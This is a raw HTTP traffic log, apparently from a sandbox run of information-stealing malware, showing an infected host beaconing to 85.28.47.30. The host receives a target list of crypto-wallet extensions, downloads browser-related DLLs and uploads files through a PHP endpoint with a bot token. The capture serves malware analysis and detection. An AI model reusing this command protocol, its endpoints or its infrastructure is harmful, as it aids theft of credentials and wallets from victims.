                                                                Jul 5, 2024 04:35:58.219881058 CEST466OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF
                                                                Host: 85.28.47.30
                                                                Content-Length: 268
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a
                                                                Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="message"fplugins------EBAAAFBGDBKKEBGCFCBF--
                                                                Jul 5, 2024 04:35:58.403156042 CEST335INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:35:58 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=97
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                Jul 5, 2024 04:35:58.422301054 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID
                                                                Host: 85.28.47.30
                                                                Content-Length: 6407
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:35:58.422334909 CEST6407OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 46 42 41 41 41 46 48 4a 45 42 46 49 45 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34
                                                                Data Ascii: ------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------JJJKFBAAAFHJEBFIEGIDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                Jul 5, 2024 04:35:59.076169014 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:35:58 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=96
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:35:59.339410067 CEST90OUTGET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:35:59.519110918 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:35:59 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                ETag: "10e436-5e7eeebed8d80"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1106998
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                Jul 5, 2024 04:35:59.519140005 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                Data Ascii: #N@B/81s:<R@B/92P @B
                                                                Jul 5, 2024 04:35:59.519157887 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                Jul 5, 2024 04:35:59.519181013 CEST1236INData Raw: c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 83 ec 18 8b 4d 08 85 c9 74 0c 89 0c 24 ff 15 4c 66 eb 61 99 eb 04 31
                                                                Data Ascii: ]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aSuK?
                                                                Jul 5, 2024 04:36:00.690145016 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH
                                                                Host: 85.28.47.30
                                                                Content-Length: 4599
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:01.359997034 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:00 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=94
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:36:01.655373096 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
                                                                Host: 85.28.47.30
                                                                Content-Length: 1451
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:02.326611042 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:01 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=93
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:36:02.338068962 CEST557OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGI
                                                                Host: 85.28.47.30
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 [TRUNCATED]
                                                                Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
                                                                Jul 5, 2024 04:36:02.952513933 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:02 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=92
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:36:03.189454079 CEST557OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
                                                                Host: 85.28.47.30
                                                                Content-Length: 359
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 [TRUNCATED]
                                                                Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
                                                                Jul 5, 2024 04:36:03.732852936 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:03 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=91
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:36:04.308769941 CEST90OUTGET /69934896f997d5bb/freebl3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:04.488436937 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:04 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "a7550-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 685392
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                Jul 5, 2024 04:36:05.141838074 CEST90OUTGET /69934896f997d5bb/mozglue.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:05.321665049 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:05 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "94750-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 608080
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                Jul 5, 2024 04:36:05.724782944 CEST91OUTGET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:05.904907942 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:05 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "6dde8-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 450024
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                Jul 5, 2024 04:36:06.276099920 CEST87OUTGET /69934896f997d5bb/nss3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:06.456223011 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:06 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "1f3950-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 2046288
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                Jul 5, 2024 04:36:07.983906984 CEST91OUTGET /69934896f997d5bb/softokn3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:08.163784981 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:08 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "3ef50-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 257872
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                Jul 5, 2024 04:36:08.368170023 CEST95OUTGET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:08.547836065 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:08 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "13bf0-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 80880
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                Jul 5, 2024 04:36:09.249681950 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGH
                                                                Host: 85.28.47.30
                                                                Content-Length: 1067
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:36:09.827554941 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:36:09 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=84
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
